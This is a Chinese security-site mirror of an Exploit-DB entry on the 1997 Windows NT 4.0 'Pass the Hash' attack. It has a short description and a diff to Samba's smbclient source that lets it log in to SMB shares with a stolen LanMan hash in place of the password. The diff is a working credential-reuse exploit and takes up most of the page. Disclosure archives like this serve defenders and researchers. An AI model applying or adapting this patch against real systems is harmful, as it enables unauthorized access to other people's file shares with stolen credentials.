Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client

  • Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client已关闭评论
  • 6 views
  • A+
所属分类:安全客_漏洞

Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client

漏洞ID 1053345 漏洞类型
发布时间 1997-04-08 更新时间 1997-04-08
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB ClientCVE编号 N/A
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB ClientCNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19197
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/233/info

A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to "decrypt" the password hash into its clear-text equivalent.

Paul Ashton <[email protected]> posted the theory and corresponding exploit code to NTBugtraq. In order for his code to work, you must "exist both in /etc/passwd and /usr/local/samba/private/smbpasswd as the same username and same uid as your rid in NT, and smbclient can read it".

In order for this to be used in a malicious manner, the attacker must first obtain a valid username and LanMan hash for a user account known to have access permissions to the resource on the remote NT host. 


*** orig_client.c Tue Apr 8 17:27:29 1997
--- client.c Tue Apr 8 20:57:43 1997
***************
*** 3020,3026 ****
{-1,NULL}
};

-
/****************************************************************************
send a login command
****************************************************************************/
--- 3020,3025 ----
***************
*** 3039,3044 ****
--- 3038,3061 ----
int numprots;
int tries=0;

+ #ifdef USESMBPASSWDFILE
+ /*TODO check for valid password and uid = getuid */
+ BOOL got_encpass;
+ struct passwd *pwd;
+ struct smb_passwd *smb_pass;
+ unsigned char p21[21];
+
+ memset(p21, 0, sizeof p21);
+ pwd = getpwuid(getuid());
+ if (pwd && (smb_pass = get_smbpwnam(pwd->pw_name)))
+ {
+ strcpy(password, "not empty");
+ got_pass = got_encpass = True;
+ memcpy(p21, smb_pass->smb_passwd, 16);
+ }
+ setuid(getuid());
+ #endif
+
if (was_null)
{
inbuf = (char *)malloc(BUFFER_SIZE + SAFETY_MARGIN);
***************
*** 3189,3194 ****
--- 3205,3215 ----
if (doencrypt && *pass) {
DEBUG(3,("Using encrypted passwordsn"));
passlen = 24;
+
+ #ifdef USESMBPASSWDFILE
+ if (got_encpass) E_P24(p21,cryptkey,pword);
+ else
+ #endif
SMBencrypt(pass,cryptkey,pword);
}
#else
***************
*** 3252,3257 ****
--- 3273,3281 ----
(CVAL(inbuf,smb_rcls) == ERRSRV &&
SVAL(inbuf,smb_err) == ERRbadpw)))
{
+ #ifdef USESMBPASSWDFILE
+ got_encpass =
+ #endif
got_pass = False;
DEBUG(3,("resending loginn"));
goto get_pass;

相关推荐: NT "Pass the Hash" with Modified SMB Client Vulnerability

NT "Pass the Hash" with Modified SMB Client Vulnerability 漏洞ID 1105081 漏洞类型 Access Validation Error 发布时间 1997-04-08 更新时间 1997-04-0…